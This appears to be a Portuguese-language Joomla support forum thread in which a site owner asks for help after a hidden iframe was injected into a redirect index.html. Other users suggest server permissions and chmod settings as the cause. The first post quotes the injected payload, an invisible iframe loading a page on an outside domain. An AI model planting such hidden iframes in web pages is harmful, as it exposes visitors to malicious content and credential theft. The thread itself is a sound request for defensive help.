Invasão do Joomla pelo Index.html. Alguém já soube disto?

Locked
bongatonga
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Fri Jul 14, 2006 6:02 pm

Invasão do Joomla pelo Index.html. Alguém já soube disto?

Post by bongatonga » Wed Dec 08, 2010 2:41 pm

Olá!

Eu utilizo sites em Joomla e como os mesmos estão instalados em diretórios dentro do diretório principal public_htm,
eu inseri um arquivo index.html para redirecionar as urls,
tipo:
"<meta http-equiv="refresh" content="1;url=http://www.site.com.br/diretorio/">"

O problema é que alguém acessou este arquivo index.html e inseriu o seguinte código:

"<div style="visibility:hidden"><iframe src="http://orion.martasegura.com/configuration.php" width=10 height=10></iframe></div>"

Alguém já teve este problema e/ou sabe como solucioná-lo?

Eu verifiquei que a url http://orion.martasegura.com/configuration.php vai dar direto na área administrativa de um outro site feito em Joomla!.

É possível clonar a área administrativa de um site em Joomla?

Realmente estou preocupado com o que isso possa ocasionar em prejuizo para mim e para quem estiver com o mesmo problema.

Eu mudei todas as senhas das contas de acessos dos sites que administro seja, CPanel, ftp entre outros e redirecionei
as urls diretamente pelo redirecionador do CPanel e, também, apaguei os arquivos index.html dos diretórios public_htm do servidor.
Também avisei o suporte de minha revenda para verificar o que pode ter ocorrido.

Em referência ao relatado aqui eu só encontrei um artigo relacionado no fórum do CPanel neste link:
http://www.forumcpanel.com.br/index.php ... &pid=41638

Mas também não tem resposta.

Todos os sites em Joomla que administro estão atualizados e os módulos e componentes também se encontram atualizados.
Estou verificando cada site me Joomla! que administro para saber se houve algum tipo de violação dos arquivos. Outra questão é que os anti-virus indicam se tratar de Exploit Invisível por injeção de iframe


Se alguém puder me orientar, ficarei muito grato.

User avatar
ronildo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4022
Joined: Thu Aug 18, 2005 12:39 pm
Location: São Paulo - Brazil
Contact:

Re: Invasão do Joomla pelo Index.html. Alguém já soube disto

Post by ronildo » Wed Dec 08, 2010 2:52 pm

Cara se index.php foi modificado, o problema é no seu serivdor (permissão, apache...) se fosse invasão pelo Joomla não seria esse arquivo alterado e sim algum arquivo do core.
http://www.ronildo.com.br/blog/ pt-br | twitter: twitter.com/ronildo
http://forum.joomla.org/viewtopic.php?f=23&t=144443 - FAQ Joomla [pt]
Pessoal por favor não tiro dúvidas por e-mail nem mensagem privada, por favor não insistam.

bongatonga
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Fri Jul 14, 2006 6:02 pm

Re: Invasão do Joomla pelo Index.html. Alguém já soube disto

Post by bongatonga » Wed Dec 08, 2010 3:01 pm

Olá Ronildo!

Obrigado por sua ajuda.
Isto me tirou uma preocupação grande em relação aos sites feitos em Joomla!
Como fiz uma varredura, os sites parecem que estão ok.
Eu vou verificar junto com o pessoal da revenda sobre o que pode ter ocorrido.

Obrigado!

Abraços!

User avatar
fititnt
Joomla! Hero
Joomla! Hero
Posts: 2350
Joined: Sat Jul 15, 2006 1:41 am
Location: Porto Alegre - RS - Brazil
Contact:

Re: Invasão do Joomla pelo Index.html. Alguém já soube disto

Post by fititnt » Fri Dec 31, 2010 1:26 am

Só pra citar, uma das poucas utilidades que vejo para esse tipo de coisa que te ocorreu seria fazer um plugin (no site ao qual foi redirecionado) que salva o seu usuário e senha para invasão futura . Alguém que se puxasse, poderia até fazer com que ao pegar o usuário e senha redirecionasse (sem o iframe) para o admin do seu site oficial, e talvez você nem mesmo percebesse.

Porém para alguém conseguri alterar esse arquivo index.html seu, ele teria como via outros métodos, se compreendesse o framework joomla, criar um usuário superadministrador novo e fazer o que bem entendesse no seu site. Mas nesse caso você perceberia.

Porém, só para deixar claro, esse tipo de ataque não é culpa do Joomla. Na pior das hipóteses é alguma extensão desatualizada que instalou. Porém o buraco pode ter sido bem mais embaixo, no seu host mesmo.
Emerson da Rocha Luiz
Moderador aposentado, 2008-2014 | Membro do JUGRS
http://www.fititnt.org

User avatar
himler
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Thu Feb 24, 2011 10:36 pm
Location: BRAZIL
Contact:

Re: Invasão do Joomla pelo Index.html. Alguém já soube disto

Post by himler » Sat Jun 25, 2011 3:09 pm

Verifique o chmod deste seu arquivo html, às vezes colocou 777 por engano e daí fica fácil !

albertofaria
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Fri Apr 22, 2011 10:01 pm

Re: Invasão do Joomla pelo Index.html. Alguém já soube disto

Post by albertofaria » Sat Jun 25, 2011 6:23 pm

Você deve ter cuidado com o chmod que coloca nos ficheiros e pastas, componentes instalados e versão do Joomla, pois basta que tenha problema com uma dessas variáveis, que você pode ter seu site atacado.
http://www.criarwebsites.com - Como criar websites
http://www.dicashospedagemweb.com - Dicas sobre Hospedagem Web


Locked

Return to “Segurança”